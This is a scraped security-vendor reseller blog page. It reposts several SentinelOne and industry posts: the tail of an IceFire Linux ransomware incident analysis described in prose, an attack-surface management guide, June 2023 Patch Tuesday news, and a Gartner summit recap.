The first action is to establish another shell and remove any existing files or directories named “demo” and “iFire” in the current working directory. This is presumably a means of competing with any other threat actors who may have been trying to ransom this vulnerable machine. Next, the attacker downloads “demo” and then “iFire” from infrastructure they (presumably) control. Finally, they make the filename “demo” executable and run it. At this point, file encryption begins. All of this happened at machine speed via a single concatenated command.
Detection & Response | SentinelOne’s View of the Attack
The sophistication of ransomware attacks make them difficult to detect. Evading signatures is trivial as threat actors simply update their malware. Polymorphic ransomware such as BlackMamba uses AI to dynamically modify its own code. Only a Cloud Workload Protection Platform (CWPP) agent can detect malicious activity in real time. SentinelOne’s CWPP, Singularity Cloud Workload Security, has multiple proprietary AI engines onboard, including the Behavioral AI Engine. Here is the view of the cloud ransomware attack from the SentinelOne management console:
The Behavioral AI Engine made the detection, captured the command line arguments, and automatically assembled the attack process tree using patented Storyline technology.
SentinelOne’s CWPP agent has two modes of operation: Detect Mode and Protect Mode. In Protect Mode, the CWPP agent would automatically convict and stop the malicious activity. Through real-time detection of malicious activity and automated machine-speed response, the SentinelOne CWPP agent disrupts attacks before they get started.
In this specific incident, the customer had configured the agent in Detect Mode, which alerted the customer and SentinelOne’s Vigilance team but did not take automated action to mitigate the threat. Even so, the cybersecurity professionals on our Vigilance MDR service immediately stopped the attack, escalated to the customer, and restored normal operations, including recovery of encrypted files.
Takeaways From the IceFire Ransomware Incident
The victim described in this case did nothing wrong as having publicly-facing infrastructure is common. Security architectural considerations such as network microsegmentation and geo-location based access control can augment cloud defense-in-depth. Although configuring the agent for Protect Mode may have been preferable because the vulnerable Linux server was internet-facing, the aforementioned architectural considerations can manage the risk.
Cloud ransomware attacks easily evade signature-based solutions. Agentless CWPP, with point-in-time side scans of a cloud compute instance’s memory, would be less than ideal. Machine-speed attacks demand machine-speed detection, and only a CWPP agent can provide real-time detection and OS process-level forensic visibility.
Although workload image scanning and CSPM are both important parts of a cloud security strategy, these tools alone would not have detected or prevented this Linux ransomware attack. This underscores the vital role of CWPP alongside other cloud control measures to confidently secure production runtime environments.
Ransomware targeting Linux cloud infrastructure is all too real. A 2022 research study from IBM Security reported a 146% increase in Linux ransomware variants. Why is this? Simply stated, threat actors are all too aware of the financial stakes facing enterprises. As more digital businesses depend on the cloud, security teams are leveraging state-of-the-art technology to protect intellectual property and sensitive customer data which reside there.
Conclusion
When it comes to cloud security, no single solution does it all. A robust cloud security technology stack should include a CWPP agent to detect and stop runtime threats, including but not limited to ransomware attacks, such as the one which was the subject of this analysis. For this IceFire Linux ransomware incident, the SentinelOne CWPP agent detected the attack in real-time and provided the forensic visibility needed to inform incident responders, establish root cause, and streamline recovery.
To learn about real-time cloud workload protection from SentinelOne, visit https://www.sentinelone.com/cloud/. There, you can find datasheets, customer case studies, and request to try it in your environment.
https://phxtechsol.com/wp-content/uploads/2023/06/Anatomy-of-a-Cloud-Incident-SentinelOnes-Vigilance-v.-IceFire-Ransomware-2.jpg6281200Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-15 06:21:182023-06-15 06:21:25Anatomy of a Cloud Incident | SentinelOne’s Vigilance vs. IceFire Ransomware
For decades, the world has strived for simplification through digitization. In this ongoing pursuit, things have, ironically, become complicated. While countless technologies, applications, and tools are available to help enterprises streamline their work, digitization has increased complexity for many businesses; most notably, expanding their attack surfaces.
As the number of connected devices and online services skyrocket, the task of identifying all these assets and managing each of their potential vulnerabilities has become one of the most significant security challenges enterprises face.
Digital attack surface management is high-priority for enterprise leaders protecting their operations and brand. In this post, learn what security policies and best practices support a robust attack surface management strategy and how to implement the right controls for better surface visibility.
What Attack Surfaces Are Enterprises Facing?
Enterprises face a multitude of digital attack surfaces in today’s interconnected and digitized landscape. With all businesses relying on interconnected systems, cyber threats have significantly broadened the potential avenues for both opportunistic and calculated attacks.
The digital attack surface refers to the sum total of all the potential entry points or vulnerabilities within an organization’s digital infrastructure that can be targeted by a threat actor. It encompasses the various interconnected systems, devices, networks, and software applications that can be exploited to gain unauthorized access, disrupt operations, or compromise sensitive data.
The attack surface expands as organizations adopt new technologies, such as IoT devices, cloud services, and remote work environments, which introduce even more potential weaknesses. Understanding and managing the digital attack surface is a critical task for implementing effective cybersecurity measures in the long run.
To help understand the digital attack surface, it is helpful to break it down into a number of discrete categories that represent entry points for threat actors:
Software Vulnerabilities
Hackers and cybercriminals leverage coding or implementation mistakes in third-party applications, operating systems, and other software or firmware to infiltrate networks. Exploiting vulnerabilities allows them to obtain unauthorized access to user directories or spread their malware.
Weak Credentials & Passwords
The use of easily guessable passwords or credentials that can be cracked through brute-force attacks heightens the vulnerability of administrative or privileged user accounts. Posing an increased risk of cybercriminals compromising networks, weak credentials enable threat actors to steal sensitive information, disseminate malware, and cause harm to critical infrastructure.
System & Network Misconfiguration
Inadequately configured network ports, channels, wireless access points, firewalls, or protocols all act as potential gateways for hackers. In adversary-in-the-middle (AiTM) attacks, for example, threat actors exploit weak encryption protocols used in message-passing channels, enabling unauthorized interception of communications between systems.
Internet-Facing Assets
Web applications, web servers, and other resources exposed to the public internet run the risk of possessing inherent vulnerabilities that attackers can target. These kinds of risks are considered ‘low hanging fruit’ for hackers who can inject malicious code into unprotected APIs, leading to improper disclosure or potential destruction of sensitive information stored in associated databases.
Shared Directories & Databases
Threat actors often exploit shared databases and directories across interconnected systems and devices, working to obtain unauthorized access to valuable resources or launching ransomware attacks. Once inside, they may extract sensitive information, such as personally identifiable information (PII), financial records, or intellectual property.
Shadow or Rogue IT
Shadow IT (aka Rogue IT) refers to the use of unauthorized software, applications, or services within an organization without the knowledge or approval of the IT department. Employees may adopt technology solutions outside their organization’s official IT infrastructure, which can create security risks, compliance issues, and a lack of centralized control and visibility.
How to Stay Ahead | Understanding Shifts in Digital Attack Surfaces
As businesses scale and develop, their digital footprints and inherent risks quickly expand in tandem. Many have embarked on digital transformation efforts, IoT strategies, hybrid work plans, and cloud adoption, but often, cybersecurity becomes an afterthought in such expansion efforts.
This is where digital attack surface management comes in. Managing attack surfaces allows enterprises to proactively identify and mitigate potential vulnerabilities. By conducting thorough assessments of their systems, networks, and applications, businesses can identify weak points and take necessary steps to fortify their defenses. This includes patching software vulnerabilities, implementing robust access controls, and configuring firewalls and intrusion detection systems effectively.
Also to consider is that the digital attack surface landscape is continually evolving, driven by technological developments and changes in how organizations operate. To get ahead in an ever-shifting landscape, enterprise leaders are focusing on actively discovering, assessing, and addressing the exposure of their internet-facing assets. Proactively managing attack surfaces also minimizes the potential impact of cyberattacks.
In the event of a breach, organizations with a well-managed attack surface are better equipped to contain and mitigate the damage. They have established incident response plans, backups, and disaster recovery strategies in place to get the organization quickly past downtime and data loss, preventing long-term reputational damage.
Identify the Scope of the Risks | Get to Know Your Attack Surfaces
Businesses can enhance their understanding of their digital attack surfaces and make informed decisions to mitigate those risks effectively. Regular assessments, comprehensive visibility, and continuous monitoring are essential for staying ahead of evolving threats and maintaining a robust security posture.
In an initial assessment, enterprise leaders and security teams can perform the following to start building a comprehensive scope of the high-risk areas in their systems:
Complete a comprehensive asset inventory – Maintain an updated inventory of all systems, applications, devices, and services connected to the network. This includes both on-premises and cloud-based assets. Regularly audit and review the inventory to identify any gaps or missing components.
Create detailed network maps and diagrams – These help security teams visualize the connectivity and interactions between different systems, devices, and networks. This is a key step in helping to identify potential entry points and vulnerabilities.
Conduct a full vulnerability scan – Regular vulnerability scans and penetration tests help identify weaknesses and potential attack vectors within an infrastructure. These assessments should cover both internal and external assets, including web applications, network devices, and databases.
Assess any third-party risks – Third-parties including vendors and partners need to be evaluated for their own security posture and policies. Potential risks are often introduced through external connections.
Perform threat modeling – Threat modeling is a systematic approach to identifying and evaluating potential vulnerabilities in a system. Threat modeling helps organizations proactively identify and address potential security issues before they are exploited by facilitating informed decision-making, resource allocation, and risk management strategies.
Reduce the Risk | Implement Attack Surface Minimization Strategies
Building a strong and effective security stance against ranging cyber risks requires an ongoing and comprehensive approach where both internal and external attack surfaces are considered. Organizations can significantly reduce their digital attack surface risks by continuously evaluating and updating security measures to address emerging trends in cyber threats and vulnerabilities reported by the cyber defense community.
Build an inventory that classifies all assets – Maintain a comprehensive inventory of all assets, including hardware, software, applications, and data. Classify assets based on their criticality and sensitivity to prioritize security efforts effectively.
Proactively manage known vulnerabilities – Implement a robust vulnerability management program. This will involve regular scanning, assessing new software and applications, and a stringent patch management plan. Identify vulnerabilities, prioritize them based on severity, and promptly any new security updates.
Segment the network – Implement network segmentation to create isolated zones within the infrastructure. This limits lateral movement for attackers and contains potential breaches, minimizing the impact on critical systems and sensitive data.
Prioritize access controls and authentication protocols – Enforcing strong access controls, such as multi-factor authentication (MFA), is the first step in preventing unauthorized access. Businesses can also minimize their identity attack surface by regularly reviewing user access privileges based on the principle of least privilege (PoLP).
Implement continuous monitoring and logging capabilities – Implement robust monitoring and logging mechanisms to detect and respond to security events promptly. Continuously monitor systems, networks, and applications for signs of compromise or abnormal behavior.
Protect data through encryption – Encrypt sensitive data at rest and in transit to protect it from unauthorized access. Implement encryption protocols and data loss prevention measures to safeguard critical information.
Prepare for the Long Term | Manage Digital Attack Surfaces
As new platforms, devices, and software emerge on the market, cybercriminals have fresh avenues to exploit vulnerabilities and target unsuspecting users. Evolving tactics and techniques feed new threats, so businesses managing their digital attack surfaces must also remain agile. Enterprise leadership and security teams can come together to intake incoming threat intelligence and translate them into new and updated security policies that will better safeguard the business.
The preventative best practices below make up the steps needed to build a long-term defense strategy against future threats, vulnerabilities, and attack surfaces:
Invest in company-wide security awareness training – Conduct regular security awareness training for employees to educate them about potential threats, phishing scams, social engineering techniques, and safe computing practices. Encourage a culture of cybersecurity awareness and vigilance.
Build an incident response plan (IRP) – Develop a comprehensive IRP to outline the steps to be taken in the event of a security incident. Under an attack, streamlined communication between teams is vital. The plan should include containment, removal, and recovery strategies to minimize the impact of an attack.
Maintain ongoing security testing – Be sure to conduct regular security testing, including penetration testing and vulnerability assessments, to identify new or hidden weaknesses. Ongoing testing is also important in validating the effectiveness of security controls.
Update the business’s risk profiles – Regularly assess the evolving risk landscape to identify emerging threats, vulnerabilities, and attack vectors. Stay updated on the latest security trends, industry best practices, and regulatory requirements to adjust security measures accordingly.
Develop policies for managing third-party risks – Assess the security posture of third-party vendors and partners who have access to the enterprise’s systems or data. Establish clear security requirements, conduct regular audits or assessments, and monitor their compliance with security standards.
Conclusion
The world of cyber threats is always in a state of flux and threat actors will continue to develop their methods and tools, just like how enterprises continue to build and scale their businesses. Staying ahead of threat actors starts with meeting them on the attack surfaces that they operate on and putting in the right policies and security solutions to hinder them.
While no business is immune from cyber attacks, SentinelOne’s autonomous, AI-driven solutions can help deliver comprehensive security for those in search of protection across all of their attack surfaces. In a single cybersecurity platform, SentinelOne’s Singularity XDR, fuses together the data, access, control, and integration planes of its endpoint protection (EPP), endpoint detection and response (EDR), IoT security, cloud workload protection (CWPP), and identity threat detection and response (ITDR). With Singularity, organizations gain access to back-end data across the organization through a single solution, providing a cohesive view of their network and assets by adding a real time autonomous security layer across all enterprise assets.
Request a demo of Singularity XDR to start leveraging AI-powered prevention, detection, response, and threat hunting across user endpoints, containers, cloud workloads, and IoT devices. Need expert advice? Contact us today!
SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response.
https://phxtechsol.com/wp-content/uploads/2023/06/Defending-From-the-Ground-Up-How-to-Secure-the-Enterprises-Digital-Attack-Surfaces.jpg6281200Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-14 06:12:132023-06-14 06:12:15Defending From the Ground Up | How to Secure the Enterprise’s Digital Attack Surfaces
Microsoft Corp. today released software updates to fix dozens of security vulnerabilities in its Windows operating systems and other software. This month’s relatively light patch load has another added bonus for system administrators everywhere: It appears to be the first Patch Tuesday since March 2022 that isn’t marred by the active exploitation of a zero-day vulnerability in Microsoft’s products.
June’s Patch Tuesday features updates to plug at least 70 security holes, and while none of these are reported by Microsoft as exploited in-the-wild yet, Redmond has flagged several in particular as “more likely to be exploited.”
Top of the list on that front is CVE-2023-29357, which is a “critical” bug in Microsoft SharePoint Server that can be exploited by an unauthenticated attacker on the same network. This SharePoint flaw earned a CVSS rating of 9.8 (10.0 is the most dangerous).
“An attacker able to gain admin access to an internal SharePoint server could do a lot of harm to an organization,” said Kevin Breen, director of cyber threat research at Immersive Labs. “Gaining access to sensitive and privileged documents, stealing and deleting documents as part of a ransomware attack or replacing real documents with malicious copies to further infect users in the organization.”
There are at least three other vulnerabilities fixed this month that earned a collective 9.8 CVSS score, and they all concern a widely-deployed component called the Windows Pragmatic General Multicast (PGM), which is used for delivering multicast data — such as video streaming or online gaming.
Security firm Action1 says all three bugs (CVE-2023-32015, CVE-2023-32014, and CVE-2023-29363) can be exploited over the network without requiring any privileges or user interaction, and affected systems include all versions of Windows Server 2008 and later, as well as Windows 10 and later.
It wouldn’t be a proper Patch Tuesday if we also didn’t also have scary security updates for organizations still using Microsoft Exchange for email. Breen said this month’s Exchange bugs (CVE-2023-32031 and CVE-2023-28310) closely mirror the vulnerabilities identified as part of ProxyNotShell exploits, where an authenticated user in the network could exploit a vulnerability in the Exchange to gain code execution on the server.
Breen said while Microsoft’s patch notes indicate that an attacker must already have gained access to a vulnerable host in the network, this is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other internal targets.
“Just because your Exchange server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said, noting that Microsoft says the Exchange flaws are not difficult for attackers to exploit.
For a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the always-useful Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.
As always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.
https://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpg00Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-14 05:34:282023-06-14 05:34:31Microsoft Patch Tuesday, June 2023 Edition
Gartner’s annual Security & Risk Management Summit hosted this week drew in more than 4300 attendees – a far larger crowd than recent years. Each year, cybersecurity and risk management leaders from across the globe gather to drive digital change, improve their responsiveness to the threat landscape, and share strategies on how to achieve security excellence.
At this year’s event, many of the conversations centered around how leaders could become proactive business partners, leaning into an offensive pursuit of understanding cyber threats while upkeeping a strong defense.
For those who couldn’t join us in person in National Harbor, Maryland, this post highlights notable takeaways straight from the SentinelOne team on the ground.
“Minimum Effective” | Adopting A Deliberate, ROI-Driven Mindset
Gartner’s Senior Director Analyst, Henrique Teixiera, kicked off the 2023 event by setting a scene all too familiar in today’s threat climate. “Many CISOs are burnt out and feel they have little control over their stressors or work-life balance,” he said. “Cybersecurity leaders and their teams are putting in the maximum effort, but it’s not having maximum impact.” As the cost of cyberattacks continues to climb and threat actors further streamline their tactics, many leaders are readjusting their strategies to maximize cybersecurity’s impact for their businesses.
This year’s keynote introduced the idea of the “minimum effective” mindset – a fundamental shift in how leaders approach ROI and lead cybersecurity into the future. Leigh McMullen, Distinguished VP Analyst at Gartner, explained that this mindset enables “cybersecurity functions to go beyond merely ‘defending the fort’ to unlocking their true potential to create tangible value.” In this frame of thinking, a stronger security practice can be achieved when leaders shed the notion that security teams must give maximum inputs to get maximum impact and value out of their security investments.
Expanding on the topic of value, both keynote speakers busted several myths to illustrate this philosophical shift. One such myth is that more security tools equals better protection. Not true, said the analysts. Instead, having a “minimum effective toolset,” or the fewest technologies required to observe, defend, and respond to threats actually help organizations achieve better protection.
Showfloor Showdown | Seeing SentinelOne’s XDR Combat Real-World Use Cases
Using EDR and XDR technologies, modern enterprises have been empowered to move beyond traditional protection-only tools towards holistic and real-time management across entire digital landscapes. To showcase the power of EDR and XDR platforms, Gartner analysts hosted their first EDR/XDR Showfloor Showdown at this year’s summit event.
The showdown pitted Prateek Bhajanka, SentinelOne Field CISO and former Gartner analyst, in a friendly competition against industry peers from Microsoft and Palo Alto Networks. Prateek demonstrated how the SentinelOne Singularity Platform addresses a set of use cases defined by Gartner analysts. Prateek’s energetic presentation and the powerful capabilities of our platform kept a standing-room only audience engaged to the end.
Session Highlights | Extracting Maximum Value from Current Tools
Global spending on cybersecurity tools numbers in the range of billions per year, but cyber attackers continue to permeate every industry without pause. Facing the reality of shrinking budgets and evolving threats, it is critical for enterprise leaders to extract value from their security tools and make the right investments. This means learning how to leverage the existing potential of their current stacks.
In another packed session, Prateek’s presentation, Make Every Dollar Count: Maximizing Value of Security Investments, provided attendees with actionable information for optimizing the value of existing cybersecurity expenditures and tips for making informed decisions to combat cyber threats while working within limited budgets.
This presentation is now available in an on-demand webinar. Watch here!
The Future of Cloud | Powering Cloud Security With AI
In today’s fast expanding cyber threat ecosystem, artificial intelligence (AI) and machine learning (ML) have become key drivers in automating the processes needed to identify and respond to advanced cyber threats. Designed to learn emerging threat patterns and identify new, malicious behaviors based on existing TTPs, exploits, and malware, AI and ML will continue to transform the security community in ways yet to be discovered.
The SentinelOne booth at Gartner’s summit sought to showcase the spirit of using AI and ML to power modern cloud security strategies. Proud to be at the leading edge of this innovative work, we highlighted the cloud workload protection, real-time detection, simplified automated response, and hybrid cloud unification delivered by Singularity Cloud.
With tens of thousands of accounts spread across multiple clouds, modern organizations need the right security defending their cloud infrastructure. Singularity Cloud works by extending distributed, autonomous endpoint protection, detection, and response to compute workloads running in both public and private clouds, as well as on-prem data centers.
Learn more about how SentinelOne’s AI-powered cloud security is focused on responding faster and smarter to improve your cloud security plan and fuse autonomous threat hunting, EDR capability, and security together to fit your business.
Theme Recap | Reflecting on “Minimum Effective” For Maximum Value
As more enterprises journey onwards towards digital transformation to get ahead of both cyber threats and business risks, security leaders must act as agents of change to implement the minimum effective mindset across data, technology, cyber expertise, and operational controls.
This theme was carried throughout the various sessions featured at this year’s summit, with several notable ones summarized below:
In a session designed to help security pros understand and prioritize the myriad capabilities and acronyms that make up cloud security “cooking ingredients,” Gartner Senior Director Analyst Charlie Winckless asked the audience, “Is your cloud kitchen in order?” He described what each technology brings to an organization, and when and how to use them most effectively.
Managed Detection and Response (MDR) was also addressed as a key part of the value equation. According to Gartner VP Analyst Pete Shoard, “MDR solutions differentiate on their actionable deliverables and business-driven outcomes,” meaning that the most effective MDR providers work to understand customers’ business needs to deliver only the most relevant deliverables, risks, and outcomes.
Attendees were also asked to check their XDR state of mind when Gartner VP Analyst Chris Silva discussed the path to an XDR architecture. He explained that rich context in XDR relies on multiple tools sharing correlated data for instant consumption by an analyst or playbook. He outlined three paths for organizations with different needs: data integration, process integration, and risk visibility. Each path included elements of value whether through tool consolidation, data prioritization based on cost, or integration and optimization.
How SentinelOne’s Singularity XDR Drives Maximum Value
The Singularity XDR Platform empowers security teams with a more efficient way to protect their business’ critical data and assets against today’s sophisticated threats. By unifying extended detection and response capabilities across security layers including endpoint, cloud, identity, network, and mobile, security teams can automate response across their technology stack and gain end-to-end visibility for maximum value.
Singularity XDR is trusted by customers worldwide who aim to approach cybersecurity from a faster, more autonomous angle. Across any digital or analog surface, Singularity XDR:
Ingests native and third party endpoint, cloud, and identity telemetry
Correlates related events automatically across an entire ecosystem
Analyzes and proactively hunts from any source within the same console
Streamlines operations with custom detections and automated responses
Resolves threats anywhere in a tech stack by taking informed, orchestrated action
Conclusion
This years’ summit has been another one for the books and the incredible turnout has bolstered SentinelOne’s resolve to keep innovating, investing, and pushing for a safer future. We’d like to thank Gartner for hosting this value-driven event where cybersecurity vendors, presenters, and customers alike were able to share their insights and new ideas on how to better our approach to both proactive and defensive security.
To learn more about how SentinelOne can help protect your organization, contact us or book a demo and see our value-driven security offerings first hand.
https://phxtechsol.com/wp-content/uploads/2023/06/Gartner-Summit-2023-Recap-Maximizing-Value-In-Defense-of-the-Enterprise.jpg6281200Phoenix Technologyhttps://phxtechsol.com/wp-content/uploads/2017/02/PTS-Horiz-logo-1-1200-300x53.jpgPhoenix Technology2023-06-10 05:34:122023-06-10 05:34:25Gartner Summit 2023 Recap | Maximizing Value In Defense of the Enterprise
We may request cookies to be set on your device. We use cookies to let us know when you visit our websites, how you interact with us, to enrich your user experience, and to customize your relationship with our website.
Click on the different category headings to find out more. You can also change some of your preferences. Note that blocking some types of cookies may impact your experience on our websites and the services we are able to offer.
Essential Website Cookies
These cookies are strictly necessary to provide you with services available through our website and to use some of its features.
Because these cookies are strictly necessary to deliver the website, refusing them will have impact how our site functions. You always can block or delete cookies by changing your browser settings and force blocking all cookies on this website. But this will always prompt you to accept/refuse cookies when revisiting our site.
We fully respect if you want to refuse cookies but to avoid asking you again and again kindly allow us to store a cookie for that. You are free to opt out any time or opt in for other cookies to get a better experience. If you refuse cookies we will remove all set cookies in our domain.
We provide you with a list of stored cookies on your computer in our domain so you can check what we stored. Due to security reasons we are not able to show or modify cookies from other domains. You can check these in your browser security settings.
Google Analytics Cookies
These cookies collect information that is used either in aggregate form to help us understand how our website is being used or how effective our marketing campaigns are, or to help us customize our website and application for you in order to enhance your experience.
If you do not want that we track your visit to our site you can disable tracking in your browser here:
Other external services
We also use different external services like Google Webfonts, Google Maps, and external Video providers. Since these providers may collect personal data like your IP address we allow you to block them here. Please be aware that this might heavily reduce the functionality and appearance of our site. Changes will take effect once you reload the page.
Google Webfont Settings:
Google Map Settings:
Google reCaptcha Settings:
Vimeo and Youtube video embeds:
Other cookies
The following cookies are also needed - You can choose if you want to allow them: